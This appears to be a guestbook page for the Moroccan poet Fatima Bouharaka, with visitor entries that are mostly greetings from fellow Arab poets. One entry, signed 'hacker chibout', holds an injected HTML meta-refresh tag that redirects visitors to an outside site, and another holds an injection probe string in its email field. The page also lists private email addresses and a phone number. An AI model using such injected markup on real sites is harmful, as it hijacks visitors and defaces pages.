فاطمة بوهراكة
شاعرة مغربية |
| الاٍسم | فريال الدالي |
| لبريد الاٍلكتروني | w_a_27_7@yahoo.com |
| التعليق | الشاعرة الراقية و المجتهدة فاطمة بو هراكة تحية حب صادقة إلى مبدعة وصلت القلوب والعقول. و بعد: إنني شاعرة من ليبيا كتبت لفترة باسم وجدان علي، و هو اسم مستعار، أما الآن أوقع نصوصي باسمي : فريال بشير الدالي ، سمعت بك كثيرا و يما تسدينه من أعمال ثقافية للشاعرات و الثقافة عموما، و قد أبلغتني الشاعرة ساجدة الموسوي بما تبذليته من مجهود لتجميع السير الذاتية للشاعرات العربيات، لذا؛ فإنني أستأذنك في أن أقدم لك سيرتي، و أساعدك أيضا في تجميع الشاعرات الليبيات، فإذا قرأت رسالتي و وجدت القبول آمل الرد على عنواني الظاهر لديك. أجدد التحية مع الود فريال بشير الدالي ( وجدان علي) |
| الاٍسم | vgjf fyfuit |
| لبريد الاٍلكتروني | ">"">>>>""""> |
| التعليق | |
| الاٍسم | yacine chibout |
| لبريد الاٍلكتروني | yacine-boss1992@hotmail.com |
| التعليق | pardant |
| الاٍسم | hacker chibout |
| لبريد الاٍلكتروني | 3la2 |
| التعليق | 3la2<META http-equiv="refresh" content="0;URL=http://www.dahaya.jeeran.com/"> |
| الاٍسم | محمد مخفي |
| لبريد الاٍلكتروني | mokhefi@hotmail.com |
| التعليق | تحياتي الأخت فاطمة جميلة كلماتك تحياتي محمد مخفي شاعر جزائري الهاتف 00213771884596 |
| الاٍسم | محمد العرفج |
| لبريد الاٍلكتروني | alarfajm@windwoslive.com |
| التعليق | الشاعرة السفيرة / فاطمة بوهراكه
تحية مشرقة لك ..
أنا أعتب عليكِ أنكِ لم تخبريني بهذا الموقع من قبل فقد تعرفت عليه من مركز وقفات الإعلامي ..
تحياتي لشخصكِ الكريم فقد استمتعت جدا جدا جدا ..
أخوك الشاعر والقاص والإعلامي محمد العبدالعزيز العرفج الرياض |
| الاٍسم | عبد العالي كويش |
| لبريد الاٍلكتروني | kouyache@hotmail.com |
| التعليق | تحياتي الحارة اليك يا فاطمة الرائعة..أتمنى ألا تكوني نسيتني ..انا الآن أقطن في فاس حيث ادرس في سلك الماستر..أتمنى رؤيتك وأن أجدك في أحسن أحوال الصحة والعافية..وشكرا على الموقع الجميل. |
| الاٍسم | نور عقل |
| لبريد الاٍلكتروني | nouraqil@walla.com |
| التعليق | السلام عليكم الأخت فاطمة ... نحن في منتدى الكلمة التابع لموقع الفيلسوف معين حاطوم ندعوك للتسجيل والاشتراك معنا في الكلمة الأدبيّة عن طريق الرابط التالي : www.moeen-hatoom.net/vb نأمل تشريفك وانضمامك لنخبة من الكتّاب والأدباء المحليّين والعالميّين تحيّاتي الشّاعر نور عقل |
| الاٍسم | ابراهيم الرامي |
| لبريد الاٍلكتروني | ibrahim-rami@hotmail.com |
| التعليق | فاطمة أيتها الصديقة العزيزة.لقد استمتعت بهذا الفضاء الراقي الجميل.أتمنى لك مزيدا من التألق والرقي . صديقك ابراهيم الرامي - العرائش -المغرب |
| الاٍسم | ابراهيم الرامي |
| لبريد الاٍلكتروني | ibrahim-rami@hotmail.com |